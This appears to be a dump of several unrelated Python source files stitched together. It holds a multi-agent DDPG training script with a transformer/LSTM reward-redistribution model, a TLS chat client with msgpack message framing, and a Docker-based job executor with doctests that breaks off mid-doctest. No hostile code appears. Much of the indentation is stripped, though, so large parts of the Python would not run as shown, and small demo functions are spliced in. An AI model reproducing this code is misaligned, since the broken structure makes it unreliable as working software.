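    e = Emitter("collector.example.com", protocol="https", method="get",
                buffer_size=2, on_success=ok, on_failure=failed)
    e.input({"e": "pv", "url": "http://example.com", "page": "Home"})
    e.input({"e": "pv", "url": "http://example.com/about", "page": "About"})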
|
main_vec_dist_SeqMod.py
|
import argparse
import math
from collections import namedtuple
from itertools import count
import numpy as np
from eval import eval_model_q
import copy
import torch
from ddpg_vec import DDPG
from ddpg_vec_hetero import DDPGH
import random
import pickle
from replay_memory import ReplayMemory, Transition, ReplayMemory_episode
from utils import *
import os
import time
from utils import n_actions, copy_actor_policy
from ddpg_vec import hard_update
import torch.multiprocessing as mp
from multiprocessing import Queue
from multiprocessing.sharedctypes import Value
import sys
from pathlib import Path
save_path = str(Path(os.path.abspath(__file__)).parents[2]) + '/results'
save_model_path = save_path + '/ckpt_plot'
tensorboard_path = save_path + '/runs'
sys.path.append(str(Path(os.path.abspath(__file__)).parents[1])+'/former')
sys.path.append(str(Path(os.path.abspath(__file__)).parents[1])+'/maddpg')
sys.path.append(str(Path(os.path.abspath(__file__)).parents[1]))
import numpy as np
import torch
from former import util
from former.util import d, here
import former
from torch import nn
import torch.nn.functional as F
from torch.utils.tensorboard import SummaryWriter
parser = argparse.ArgumentParser(description='PyTorch REINFORCE example')
parser.add_argument('--scenario', required=True,
help='name of the environment to run')
parser.add_argument('--gamma', type=float, default=0.95, metavar='G',
                    help='discount factor for reward (default: 0.95)')
parser.add_argument('--tau', type=float, default=0.01, metavar='G',
                    help='soft target-update coefficient (default: 0.01)')
parser.add_argument('--ou_noise', type=bool, default=True)
parser.add_argument('--param_noise', type=bool, default=False)
parser.add_argument('--train_noise', default=False, action='store_true')
parser.add_argument('--noise_scale', type=float, default=0.3, metavar='G',
help='initial noise scale (default: 0.3)')
parser.add_argument('--final_noise_scale', type=float, default=0.3, metavar='G',
help='final noise scale (default: 0.3)')
parser.add_argument('--exploration_end', type=int, default=60000, metavar='N',
                    help='number of episodes with noise (default: 60000)')
parser.add_argument('--seed', type=int, default=0, metavar='N',
help='random seed (default: 0)')
parser.add_argument('--batch_size', type=int, default=1024, metavar='N',
                    help='batch size (default: 1024)')
parser.add_argument('--num_steps', type=int, default=25, metavar='N',
                    help='max episode length (default: 25)')
parser.add_argument('--num_episodes', type=int, default=100000, metavar='N',
                    help='number of episodes (default: 100000)')
parser.add_argument('--hidden_size', type=int, default=128, metavar='N',
                    help='hidden layer size (default: 128)')
parser.add_argument('--updates_per_step', type=int, default=8, metavar='N',
                    help='actor updates per simulator step (default: 8)')
parser.add_argument('--critic_updates_per_step', type=int, default=8, metavar='N',
                    help='critic updates per simulator step (default: 8)')
parser.add_argument('--replay_size', type=int, default=1000000, metavar='N',
help='size of replay buffer (default: 1000000)')
parser.add_argument('--actor_lr', type=float, default=1e-2,
                    help='actor learning rate (default: 1e-2)')
parser.add_argument('--critic_lr', type=float, default=1e-2,
                    help='critic learning rate (default: 1e-2)')
parser.add_argument('--fixed_lr', default=False, action='store_true')
parser.add_argument('--num_eval_runs', type=int, default=1000, help='number of runs per evaluation (default: 1000)')
parser.add_argument("--exp_name", type=str, help="name of the experiment")
parser.add_argument("--save_dir", type=str, default=save_model_path,
help="directory in which training state and model should be saved")
parser.add_argument('--static_env', default=False, action='store_true')
parser.add_argument('--critic_type', type=str, default='mlp', help="Supports [mlp, gcn_mean, gcn_max]")
parser.add_argument('--actor_type', type=str, default='mlp', help="Supports [mlp, gcn_max]")
parser.add_argument('--critic_dec_cen', default='cen')
parser.add_argument("--env_agent_ckpt", type=str, default='ckpt_plot/simple_tag_v5_al0a10_4/agents.ckpt')
parser.add_argument('--shuffle', default=None, type=str, help='None|shuffle|sort')
parser.add_argument('--episode_per_update', type=int, default=4, metavar='N',
                    help='episodes between updates (default: 4)')
parser.add_argument('--episode_per_actor_update', type=int, default=4)
parser.add_argument('--episode_per_critic_update', type=int, default=4)
parser.add_argument('--steps_per_actor_update', type=int, default=100)
parser.add_argument('--steps_per_critic_update', type=int, default=100)
#parser.add_argument('--episodes_per_update', type=int, default=4)
parser.add_argument('--target_update_mode', default='soft', help='soft | hard | episodic')
parser.add_argument('--cuda', default=False, action='store_true')
parser.add_argument('--eval_freq', type=int, default=1000)
args = parser.parse_args()
if args.exp_name is None:
args.exp_name = args.scenario + '_' + args.critic_type + '_' + args.target_update_mode + '_hiddensize' \
+ str(args.hidden_size) + '_' + str(args.seed)
print("=================Arguments==================")
for k, v in args.__dict__.items():
print('{}: {}'.format(k, v))
print("========================================")
torch.set_num_threads(1)
device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
env = make_env(args.scenario, None)
n_agents = env.n
env.seed(args.seed)
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
num_adversary = 0
n_actions = n_actions(env.action_space)
obs_dims = [env.observation_space[i].shape[0] for i in range(n_agents)]
obs_dims.insert(0, 0)
if 'hetero' in args.scenario:
import multiagent.scenarios as scenarios
groups = scenarios.load(args.scenario + ".py").Scenario().group
agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device, groups=groups)
eval_agent = DDPGH(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu', groups=groups)
else:
agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, device)
eval_agent = DDPG(args.gamma, args.tau, args.hidden_size,
env.observation_space[0].shape[0], n_actions[0], n_agents, obs_dims, 0,
args.actor_lr, args.critic_lr,
args.fixed_lr, args.critic_type, args.actor_type, args.train_noise, args.num_episodes,
args.num_steps, args.critic_dec_cen, args.target_update_mode, 'cpu')
memory = ReplayMemory(args.replay_size)
memory_e = ReplayMemory_episode(int(args.replay_size/args.num_steps))
feat_dims = []
for i in range(n_agents):
feat_dims.append(env.observation_space[i].shape[0])
# Find main agents index
unique_dims = list(set(feat_dims))
agents0 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[0]]
if len(unique_dims) > 1:
agents1 = [i for i, feat_dim in enumerate(feat_dims) if feat_dim == unique_dims[1]]
main_agents = agents0 if len(agents0) >= len(agents1) else agents1
else:
main_agents = agents0
rewards = []
total_numsteps = 0
updates = 0
exp_save_dir = os.path.join(args.save_dir, args.exp_name)
os.makedirs(exp_save_dir, exist_ok=True)
best_eval_reward, best_good_eval_reward, best_adversary_eval_reward = -1000000000, -1000000000, -1000000000
start_time = time.time()
value_loss, policy_loss = 0.0, 0.0
copy_actor_policy(agent, eval_agent)
torch.save({'agents': eval_agent}, os.path.join(exp_save_dir, 'agents_best.ckpt'))
# for mp test
test_q = Queue()
done_training = Value('i', False)
p = mp.Process(target=eval_model_q, args=(test_q, done_training, args))
p.start()
####################################################
Transition_e = namedtuple(
'Transition_episode', ('states', 'actions', 'masks', 'next_states', 'rewards'))
use_agent_attention = False
use_rudder = False
def sample_trajectory(memory, n_trajectories=128, use_agent_attention=False, use_rudder=False):
sample_traj = random.sample(memory, n_trajectories)
samples = Transition_e(*zip(*sample_traj))
next_states = np.array(list(samples.next_states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
states = np.array(list(samples.states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
all_states = np.concatenate((states[:,:,0,:][:,:,np.newaxis,:], next_states), axis=2)
rewards = np.array(list(samples.rewards)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
episode_reward = np.sum(np.squeeze(rewards[:,0,:,:],axis=2), axis=1)
episode_time_reward = np.squeeze(rewards[:,0,:,:],axis=2)
x_train_tensor = torch.from_numpy(next_states).float().contiguous()
xall_train_tensor = torch.from_numpy(all_states).float().contiguous()
y_train_tensor = torch.from_numpy(episode_reward).float().contiguous()
episode_time_reward_tensor = torch.from_numpy(episode_time_reward).float().contiguous()
if use_agent_attention:
return x_train_tensor, y_train_tensor, episode_time_reward_tensor
elif use_rudder:
return xall_train_tensor.transpose(1,2).contiguous().view(n_trajectories, args.num_steps+1, -1), y_train_tensor, episode_time_reward_tensor
else:
return x_train_tensor.transpose(1,2).contiguous().view(n_trajectories, args.num_steps, -1), y_train_tensor, episode_time_reward_tensor
def sample_and_pred(memory, model, batch_size, n_agents, n_trajectories=128,
use_agent_attention=False, use_rudder=False):
sample_traj = random.sample(memory, n_trajectories)
samples = Transition_e(*zip(*sample_traj))
next_states = np.array(list(samples.next_states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
# Construct inputs
if not use_agent_attention:
if use_rudder:
states = np.array(list(samples.states)).reshape(n_trajectories, args.num_steps, n_agents, -1).transpose((0,2,1,3))
all_states = np.concatenate((states[:,:,0,:][:,:,np.newaxis,:], next_states), axis=2)
x_train_tensor = torch.from_numpy(all_states).float().transpose(1,2).contiguous().view(n_trajectories, args.num_steps+1, -1)
hidden = model.init_hidden(n_trajectories)
else:
x_train_tensor = torch.from_numpy(next_states).float().transpose(1,2).contiguous().view(n_trajectories, args.num_steps, -1)
else:
x_train_tensor = torch.from_numpy(next_states).float().contiguous()
    # Predict rewards
if use_rudder:
_, y_time_hat = model(x_train_tensor.to(device), hidden)
else:
_, y_time_hat = model(x_train_tensor.to(device))
pred_rewards = np.repeat(y_time_hat.detach().cpu().numpy()[:,:,np.newaxis], n_agents, axis=2)
# Randomly sample (s,a,r,s')
ind1 = np.arange(n_trajectories)
ind2 = np.random.randint(args.num_steps, size=(n_trajectories, int(batch_size/n_trajectories)))
states = np.array(samples.states)[ind1[:,None], ind2].reshape(batch_size,-1)
actions = np.array(samples.actions)[ind1[:,None], ind2].reshape(batch_size,-1)
masks = np.array(samples.masks)[ind1[:,None], ind2].reshape(batch_size,-1)
next_states = np.array(samples.next_states)[ind1[:,None], ind2].reshape(batch_size,-1)
rewards = pred_rewards[ind1[:,None], ind2].reshape(batch_size,-1)
return Transition(states, actions, masks, next_states, rewards)
class LstmPredNet(nn.Module):
def __init__(self, embedding_dim, hidden_dim, n_layers, drop_prob=0.0):
super(LstmPredNet, self).__init__()
self.n_layers = n_layers
self.hidden_dim = hidden_dim
self.lstm = nn.LSTM(embedding_dim, hidden_dim, n_layers, dropout=drop_prob, batch_first=True)
self.dropout = nn.Dropout(drop_prob)
self.fc = nn.Linear(hidden_dim, 1)
def forward(self, x, hidden):
batch_size, t, e = x.size()
lstm_out, hidden = self.lstm(x, hidden)
lstm_out = lstm_out.contiguous().view(-1, self.hidden_dim)
out = self.dropout(lstm_out)
out = self.fc(out)
out = out.view(batch_size, -1)
final = out[:,-1]
step_reward = out[:,1:] - out[:,0:-1]
return final, step_reward
def init_hidden(self, batch_size):
weight = next(self.parameters()).data
hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().to(device),
weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().to(device))
return hidden
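# ---------------------------------------------------------------------------
# Illustrative sketch (editor's addition): how the RUDDER-style LSTM above
# redistributes an episode return over time steps. Shapes are hypothetical;
# the function is only defined here for reference and is never called.
# ---------------------------------------------------------------------------
def _rudder_decomposition_demo():
    net = LstmPredNet(embedding_dim=8, hidden_dim=16, n_layers=2).to(device)
    x = torch.randn(4, 25, 8).to(device)       # (batch, time, features)
    hidden = net.init_hidden(4)
    final, step_reward = net(x, hidden)
    # `final` predicts the episode return; `step_reward` holds the per-step
    # differences of the running prediction, i.e. the redistributed rewards.
    print(final.shape, step_reward.shape)       # torch.Size([4]), torch.Size([4, 24])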
time_length, state_emb = args.num_steps, obs_dims[-1]
n_heads = 6
depth = 3
if use_agent_attention:
reward_model = former.Time_Agent_Transformer(emb=state_emb, heads=n_heads,
depth=depth, seq_length=time_length,
n_agents=n_agents, agent=True, dropout=0.0)
elif use_rudder:
reward_model = LstmPredNet(embedding_dim=n_agents*state_emb, hidden_dim=512, n_layers=2)
else:
reward_model = former.Time_Transformer(emb=n_agents*state_emb, heads=n_heads,
depth=depth, seq_length=time_length,
n_agents=n_agents, dropout=0.0)
if torch.cuda.device_count() > 1:
print("Let's use", torch.cuda.device_count(), "GPUs!")
reward_model = nn.DataParallel(reward_model)
if torch.cuda.is_available():
reward_model.cuda()
# model(x.to(device))
opt = torch.optim.Adam(lr=0.0001, params=reward_model.parameters(), weight_decay=1e-5)
loss_fn = nn.MSELoss(reduction='mean')
def make_train_step(model, loss_fn, optimizer, use_rudder=False):
# Builds function that performs a step in the train loop
def train_step(x, y, z):
# Sets model to TRAIN mode
model.train()
if use_rudder:
batch_size, _, _ = x.size()
hidden = model.init_hidden(batch_size)
yhat, y_time_hat = model(x, hidden)
# Makes predictions
else:
yhat, y_time_hat = model(x)
# Computes loss
loss = loss_fn(y, yhat)
loss_2 = loss_fn(z, y_time_hat)
loss_total = loss + 20*torch.mean(torch.var(y_time_hat, dim=1))
# Computes gradients
loss_total.backward()
# loss.backward()
# Updates parameters and zeroes gradients
optimizer.step()
optimizer.zero_grad()
# Returns the loss
return loss.item(), loss_2.item()
# Returns the function that will be called inside the train loop
return train_step
# Creates the train_step function for our model, loss function and optimizer
train_step = make_train_step(reward_model, loss_fn, opt, use_rudder=use_rudder)
from torch.utils.tensorboard import SummaryWriter
# default `log_dir` is "runs" - we'll be more specific here
writer = SummaryWriter(tensorboard_path)
####################################################
for i_episode in range(args.num_episodes):
obs_n = env.reset()
episode_reward = 0
episode_step = 0
agents_rew = [[] for _ in range(n_agents)]
x_e, action_e, mask_e, x_next_e, reward_e = [], [], [], [], []
while True:
# action_n_1 = [agent.select_action(torch.Tensor([obs]).to(device), action_noise=True, param_noise=False).squeeze().cpu().numpy() for obs in obs_n]
action_n = agent.select_action(torch.Tensor(obs_n).to(device), action_noise=True,
param_noise=False).squeeze().cpu().numpy()
next_obs_n, reward_n, done_n, info = env.step(action_n)
total_numsteps += 1
episode_step += 1
terminal = (episode_step >= args.num_steps)
action = torch.Tensor(action_n).view(1, -1)
mask = torch.Tensor([[not done for done in done_n]])
next_x = torch.Tensor(np.concatenate(next_obs_n, axis=0)).view(1, -1)
episode_reward += np.sum(reward_n)
# if done_n[0] or terminal:
# reward = torch.Tensor([[episode_reward/(n_agents*25)]*n_agents])
# else:
# reward = torch.Tensor([[0.0]*n_agents])
# reward = torch.Tensor([reward_n])
# x = torch.Tensor(np.concatenate(obs_n, axis=0)).view(1, -1)
# memory.push(x, action, mask, next_x, reward)
x_e.append(np.concatenate(obs_n, axis=0).reshape(1,-1))
action_e.append(action_n.reshape(1,-1))
mask_e.append(np.array([[not done for done in done_n]]))
x_next_e.append(np.concatenate(next_obs_n, axis=0).reshape(1,-1))
reward_e.append(np.array([reward_n]))
# x_e.append(torch.Tensor(np.concatenate(obs_n, axis=0)).view(1, -1))
# action_e.append(torch.Tensor(action_n).view(1, -1))
# mask_e.append(torch.Tensor([[not done for done in done_n]]))
# x_next_e.append(torch.Tensor(np.concatenate(next_obs_n, axis=0)).view(1, -1))
# reward_e.append(torch.Tensor([reward_n]))
# print(obs_n[0].shape, len(obs_n))
for i, r in enumerate(reward_n):
agents_rew[i].append(r)
obs_n = next_obs_n
n_update_iter = 5
# if len(memory) > args.batch_size:
if len(memory_e) > args.batch_size * 5:
# if len(memory_e)*4 >= args.batch_size:
################################################
if total_numsteps % args.steps_per_actor_update == 0:
for _ in range(args.updates_per_step):
# transitions = memory.sample(args.batch_size)
# batch = Transition(*zip(*transitions))
# batch = memory_e.sample(args.batch_size)
batch = sample_and_pred(memory_e.memory, reward_model,
args.batch_size, n_agents,
n_trajectories=256, use_agent_attention=use_agent_attention,
use_rudder= use_rudder)
# print(batch.reward.shape)
policy_loss = agent.update_actor_parameters(batch, i, args.shuffle)
updates += 1
print('episode {}, p loss {}, p_lr {}'.
format(i_episode, policy_loss, agent.actor_lr))
if total_numsteps % args.steps_per_critic_update == 0:
value_losses = []
for _ in range(args.critic_updates_per_step):
# transitions = memory.sample(args.batch_size)
# batch = Transition(*zip(*transitions))
# batch = memory_e.sample(args.batch_size)
batch = sample_and_pred(memory_e.memory, reward_model,
args.batch_size, n_agents,
n_trajectories=256, use_agent_attention=use_agent_attention,
use_rudder= use_rudder)
value_losses.append(agent.update_critic_parameters(batch, i, args.shuffle)[0])
updates += 1
# print(value_losses)
value_loss = np.mean(value_losses)
print('episode {}, q loss {}, q_lr {}'.
format(i_episode, value_loss, agent.critic_optim.param_groups[0]['lr']))
if args.target_update_mode == 'episodic':
hard_update(agent.critic_target, agent.critic)
if done_n[0] or terminal:
            print('train episode reward', episode_reward, ' episode ', i_episode)
episode_step = 0
memory_e.push(x_e, action_e, mask_e, x_next_e, reward_e)
x_e, action_e, mask_e, x_next_e, reward_e = [], [], [], [], []
break
# print(len(memory_e))
# if len(memory_e)==12000:
# with open('trajectories3.pickle', 'wb') as handle:
# pickle.dump(memory_e, handle, protocol=pickle.HIGHEST_PROTOCOL)
################################################
# train the reward redistribution model
# if i_episode % 1000 == 0 or (len(memory_e) == args.batch_size * 5):
if (i_episode+1) % 1000 == 0 and (len(memory_e)>4000):
epoch_train_episode_reward_loss = []
epoch_train_step_reward_loss = []
for ii in range(1000):
x_batch, y_batch, z_batch = sample_trajectory(memory_e.memory, n_trajectories=128,
use_agent_attention=use_agent_attention,
use_rudder=use_rudder)
x_batch = x_batch.to(device)
y_batch = y_batch.to(device)
z_batch = z_batch.to(device)
loss, loss_2 = train_step(x_batch, y_batch, z_batch)
epoch_train_episode_reward_loss.append(loss)
epoch_train_step_reward_loss.append(loss_2)
writer.add_scalar(args.exp_name + f'_episode_reward_loss', np.mean(epoch_train_episode_reward_loss), i_episode)
writer.add_scalar(args.exp_name + f'_step_reward_loss', np.mean(epoch_train_step_reward_loss), i_episode)
if not args.fixed_lr:
agent.adjust_lr(i_episode)
writer.add_scalar(args.exp_name + f'_episode_reward', episode_reward, i_episode)
rewards.append(episode_reward)
# if (i_episode + 1) % 1000 == 0 or ((i_episode + 1) >= args.num_episodes - 50 and (i_episode + 1) % 4 == 0):
if (i_episode + 1) % args.eval_freq == 0:
tr_log = {'num_adversary': 0,
'best_good_eval_reward': best_good_eval_reward,
'best_adversary_eval_reward': best_adversary_eval_reward,
'exp_save_dir': exp_save_dir, 'total_numsteps': total_numsteps,
'value_loss': value_loss, 'policy_loss': policy_loss,
'i_episode': i_episode, 'start_time': start_time}
copy_actor_policy(agent, eval_agent)
test_q.put([eval_agent, tr_log])
env.close()
time.sleep(5)
done_training.value = True
|
chatClient.py
|
import socket
import struct
import sys
import threading
import msgpack # python -m pip install msgpack
import ssl
PORT = 10139
HEADER_LENGTH = 2
atos = lambda address: f'[{address[0]}:{address[1]}]'
def setup_SSL_context(cert: str, key: str, CA: str):
    #use TLS only, not SSL
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    # a certificate is required
    context.verify_mode = ssl.CERT_REQUIRED
    #load our own certificate and key
    context.load_cert_chain(certfile=cert, keyfile=key)
    # load the CA certificates (a self-signed certificate acts as its own CA!)
    context.load_verify_locations(CA)
    # set the SSL cipher suites (encryption method)
    context.set_ciphers('ECDHE-RSA-AES128-GCM-SHA256')
return context
def receive_fixed_length_msg(sock: socket.socket, msglen: int):
message = b''
while len(message) < msglen:
        chunk = sock.recv(msglen - len(message)) # read a few bytes
        if chunk == b'':
            raise RuntimeError("socket connection broken")
        message = message + chunk # append the bytes just read to the message
return message
def receive_message(sock: socket.socket):
    header = receive_fixed_length_msg(sock,
                                      HEADER_LENGTH) # read the message header (the first 2 bytes hold the message length)
    # convert the message length to an int
    message_length = struct.unpack("!H", header)[0]
    message = None
    if message_length > 0: # if everything is OK
        message = receive_fixed_length_msg(
            sock, message_length) # read the message
message = message.decode("utf-8")
return message
def send_message(sock: socket.socket, message: str):
    # convert the message to a byte string using the UTF-8 encoding
    encoded_message = message.encode("utf-8")
    # build the header: the first 2 bytes (HEADER_LENGTH) hold the message length
    # struct.pack "!H": ! = network byte order, H = unsigned short
    header = struct.pack("!H", len(encoded_message))
    # send the message length first, then the message itself
    message = header + encoded_message
    sock.sendall(message)
def send_pack(sock: socket.socket, o: dict):
msg = msgpack.packb(o)
header = struct.pack("!H", len(msg))
message = header + msg
sock.sendall(message)
def read_pack(sock: socket.socket):
header = receive_fixed_length_msg(sock,HEADER_LENGTH)
message_length = struct.unpack("!H", header)[0]
message = None
if message_length > 0:
message = receive_fixed_length_msg(sock, message_length)
message = msgpack.unpackb(message)
return message
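# ---------------------------------------------------------------------------
# Illustrative sketch (editor's addition): round-tripping one msgpack message
# through the 2-byte length-prefixed framing defined above, over a local
# socketpair. Defined for reference; the interactive client below never
# calls it.
# ---------------------------------------------------------------------------
def _framing_demo():
    a, b = socket.socketpair()
    send_pack(a, {"type": "msg", "msg": "hello", "for": ""})
    print(read_pack(b))  # expected: {'type': 'msg', 'msg': 'hello', 'for': ''}
    a.close()
    b.close()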
if __name__ == '__main__':
    # the message_receiver function runs in a separate thread
def message_receiver():
while True:
try:
                if msg_received := read_pack(sock): # if a message arrived
                    if msg_received['type'] == 'msg':
                        print(f"[{msg_received['from']}] : {msg_received['msg']}") # print it
                    elif msg_received['type'] == 'msg-dm':
                        print(f"[* {msg_received['from']}] : {msg_received['msg']}") # print it
                    elif msg_received['type'] == 'status':
                        print(f"!{msg_received['for']} : {msg_received['status']}") # print it
else:
print(msg_received)
except ConnectionResetError:
print("[system] Connection reset by peer!")
sys.exit()
target_addr = 'localhost'
if addr := input(f'[system] Target chat server [{target_addr}]: '):
target_addr = addr
cert = 'cert/elektron.crt'
if new_cert := input(f'[system] Certificate [{cert}]: '):
cert = new_cert
key = 'cert/elektron.key'
if new_key := input(f'[system] Key [{key}]: '):
key = new_key
ca = 'cert/streznik.crt'
if new_ca := input(f'[system] Verify location [{ca}]: '):
ca = new_ca
ctx = setup_SSL_context(cert, key, ca)
    # connect to the server
print("[system] Connecting to chat server ...")
sock = ctx.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
sock.connect((target_addr, PORT))
except ConnectionRefusedError:
print("[system] Cannot connect to server!")
sys.exit()
print("[system] Connected!")
    # run the message_receiver function in a separate thread
thread = threading.Thread(target=message_receiver)
thread.daemon = True
thread.start()
    # wait for the user to type something and send it to the server
while sock.fileno() != -1:
try:
if msg_send := input(f""):
for_ = ''
if msg_send.startswith('/w'):
try:
_, for_, msg_send = msg_send.split(' ', 2)
except ValueError:
print('Usage: /w [user] [message...]')
continue
send_pack(sock, {"type": "msg", "msg" : msg_send, "for" : for_})
except KeyboardInterrupt:
sys.exit()
|
executor.py
|
import os
import json
import time
import shlex
import socket
import shutil
import random
import subprocess
from threading import Thread
import docker
from kwikapi import Client
from basescript import BaseScript
from deeputil import AttrDict, Dummy, keeprunning
class Executor:
    # State indicating the executor is ready to execute a job.
    WREADY = "ready"
    # State indicating the executor is currently executing a job.
    WBUSY = "busy"
    # Interval (in seconds) at which the executor polls the master for a job.
JOB_INTERVAL = 10
def __init__(
self,
url=None,
version=None,
protocol=None,
hostname=None,
external_inp_dir=None,
external_out_dir=None,
external_work_dir=None,
log=Dummy(),
):
super().__init__()
self.job_id = None
self.master = Client(url=url, version=version, protocol=protocol)
self.remote_inp_dir = external_inp_dir
self.remote_out_dir = external_out_dir
self.remote_work_dir = external_work_dir
self.hostname = hostname
# FIXME:no hard coding for this
self.docker_tmp_dir = "/tmp/"
self.state = self.WREADY
self.progress = 0
self.docker_client = None
self.container_id = None
self.job_state = None
self.container_stdout = None
self.container_stderr = None
self.log_dir = None
self._state_daemon()
self._progress_daemon()
self._get_job_state_daemon()
self._handle_job_operations_daemon()
self._get_container_stdout_daemon()
self._get_container_stderr_daemon()
self._write_stdout_stderr_daemon()
self.log = log
@keeprunning()
def run(self):
"""
        The executor keeps running and requesting jobs.
        If a job is received from the master machine, it executes it.
"""
response = self.request_job()
params = self.process_response(response)
self.process_params(params)
def request_job(self):
"""
        The executor requests a job and tries to
        receive and process the response from the master.
"""
time.sleep(self.JOB_INTERVAL)
self.log.info("request_job")
job_response = self.master.worker.get_job(name=self.hostname)
return job_response
def process_response(self, response):
"""
        After receiving a response from the master machine,
        the response has to be parsed into a valid set of parameters.
>>> from pprint import pprint
>>> from executor import Executor
>>> e = Executor()
>>> e.state
'ready'
>>> response = None
>>> e.process_response(response)
>>> e.state
'ready'
>>> params = json.dumps({"external":
... {"input":"external_input",
... "output":"external_output",
... "workdir":"external_workdir"},
... "docker":
... {"image":"image",
... "input":"internal_input",
... "arguments":"arguments",
... "output":"internal_output",
... "workdir":"internal_workdir"},
... })
>>> response = {'name':'name',
... 'id':'id',
... 'preserve':'preserve',
... 'parameters':params}
>>> pprint(response)
{'id': 'id',
'name': 'name',
'parameters': '{"external": {"input": "external_input", "workdir": '
'"external_workdir", "output": "external_output"}, "docker": '
'{"input": "internal_input", "image": "image", "arguments": '
'"arguments", "workdir": "internal_workdir", "output": '
'"internal_output"}}',
'preserve': 'preserve'}
>>> pprint(e.process_response(response))
{'arguments': 'arguments',
'docker_cred': '',
'docker_inp_dir': 'internal_input',
'docker_out_dir': 'internal_output',
'docker_work_dir': 'internal_workdir',
'environment': {},
'image_name': 'image',
'job_id': 'id',
'job_name': 'name',
'preserve': 'preserve',
'remote_inp_dir': 'external_input',
'remote_out_dir': 'external_output',
'remote_work_dir': 'external_workdir'}
>>> e.state
'busy'
"""
if not response:
self.log.info("no_job", worker_state=self.state)
else:
self.log.info("job_received", worker_state=self.state)
params = self._get_parameters(response)
self.state = self.WBUSY
return params
def _get_parameters(self, response):
"""
        The job parameters have to be extracted from the response.
>>> from pprint import pprint
>>> from executor import Executor
>>> e = Executor()
>>> params = json.dumps({"external":{},
... "docker":
... {"image":"image",
... "input":"input",
... "arguments":"arguments",
... "output":"output"},
... })
>>> response = {'name':'name',
... 'id':'id',
... 'preserve':'preserve',
... 'parameters':params}
>>> pprint(response)
{'id': 'id',
'name': 'name',
'parameters': '{"external": {}, "docker": {"input": "input", "image": '
'"image", "arguments": "arguments", "output": "output"}}',
'preserve': 'preserve'}
>>> response.get('id')
'id'
>>> response.get('name')
'name'
>>> response.get('preserve')
'preserve'
>>> pprint(response.get('parameters'))
('{"external": {}, "docker": {"input": "input", "image": "image", "arguments": '
'"arguments", "output": "output"}}')
>>> json.loads(response.get('parameters'))['external']
{}
>>> pprint(json.loads(response.get('parameters'))['docker'])
{'arguments': 'arguments',
'image': 'image',
'input': 'input',
'output': 'output'}
>>> params = json.dumps({"external":
... {"input":"external_input",
... "output":"external_output",
... "workdir":"external_workdir"},
... "docker":
... {"image":"image",
... "input":"internal_input",
... "arguments":"arguments",
... "output":"internal_output",
... "workdir":"internal_workdir"},
... })
>>> response = {'name':'name',
... 'id':'id',
... 'preserve':'preserve',
... 'parameters':params}
>>> pprint(e._get_parameters(response))
{'arguments': 'arguments',
'docker_cred': '',
'docker_inp_dir': 'internal_input',
'docker_out_dir': 'internal_output',
'docker_work_dir': 'internal_workdir',
'environment': {},
'image_name': 'image',
'job_id': 'id',
'job_name': 'name',
'preserve': 'preserve',
'remote_inp_dir': 'external_input',
'remote_out_dir': 'external_output',
'remote_work_dir': 'external_workdir'}
>>>
"""
self.log.info("_handle_params", response=response)
self.job_id = job_id = response.get("id", "")
job_name = response.get("name", "")
preserve = response.get("preserve", "")
external = json.loads(response["parameters"])["external"]
external_inp_dir = external.get("input", self.remote_inp_dir)
external_out_dir = external.get("output", self.remote_out_dir)
external_work_dir = external.get("workdir", self.remote_work_dir)
docker_params = json.loads(response["parameters"])["docker"]
docker_inp_dir = docker_params.get("input", "")
docker_out_dir = docker_params.get("output", "")
docker_work_dir = docker_params.get("workdir", "")
image_name = docker_params.get("image", "")
docker_cred = docker_params.get("credentials", "")
docker_env = docker_params.get("envs", {})
docker_args = docker_params.get("arguments", "")
# FIXME: docker arguments should also contain job_id if some process requires it.
# FIXME: find a better way to implement it.
params = {
"job_id": job_id,
"job_name": job_name,
"preserve": preserve,
"docker_inp_dir": docker_inp_dir,
"docker_out_dir": docker_out_dir,
"docker_work_dir": docker_work_dir,
"image_name": image_name,
"preserve": preserve,
"remote_inp_dir": external_inp_dir,
"remote_out_dir": external_out_dir,
"remote_work_dir": external_work_dir,
"docker_cred": docker_cred,
"environment": docker_env,
"arguments": docker_args,
}
return AttrDict(params)
def _construct_docker_cmd(self, p):
"""
        The Docker image is the actual job. In order to execute it, a docker
        command has to be constructed from the job parameters.
>>> from pprint import pprint
>>> from executor import Executor
>>> e = Executor()
>>> params = {'arguments': 'arguments',
... 'docker_cred': '',
... 'docker_inp_dir': 'internal_input',
... 'docker_out_dir': 'internal_output',
... 'docker_work_dir': 'internal_workdir',
... 'environment': {},
... 'image_name': 'image',
... 'job_id': 'id',
... 'job_name': 'name',
... 'preserve': 'preserve',
... 'remote_inp_dir': 'external_input',
... 'remote_out_dir': 'external_output',
... 'remote_work_dir': 'external_workdir'}
>>> params_dict = AttrDict(params)
>>> image, volumes, argument, tmp_dir = e._construct_docker_cmd(params_dict)
>>> image
'image'
>>> pprint(volumes)
{'external_input': {'bind': 'internal_input', 'mode': 'rw'},
'external_output': {'bind': 'internal_output', 'mode': 'rw'},
'external_workdir': {'bind': 'internal_workdir', 'mode': 'rw'}}
>>> argument
'arguments'
